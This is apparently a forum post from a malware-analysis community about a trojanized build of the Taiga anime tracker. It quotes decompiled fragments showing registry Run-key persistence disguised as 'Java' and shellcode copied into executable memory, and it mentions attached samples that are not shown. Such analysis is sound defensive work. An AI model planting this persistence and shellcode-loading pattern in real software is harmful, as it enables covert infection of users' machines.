Malware targeting viewers of the chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489
Masterpiece of code (f5 in idapro)
Code: Select all
if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1
RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);
v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);
qmemcpy(v4, &unk_412780, 0x18Bu);
In attach modified taiga and downloader exe dropped by above shellcode and implemented also through shellcode. I don't have actual payload it downloads but also don't expect anything interesting from it (probably some of retarded ransomwares which is not interesting at all in any case).
You do not have the required permissions to view the files attached to this post.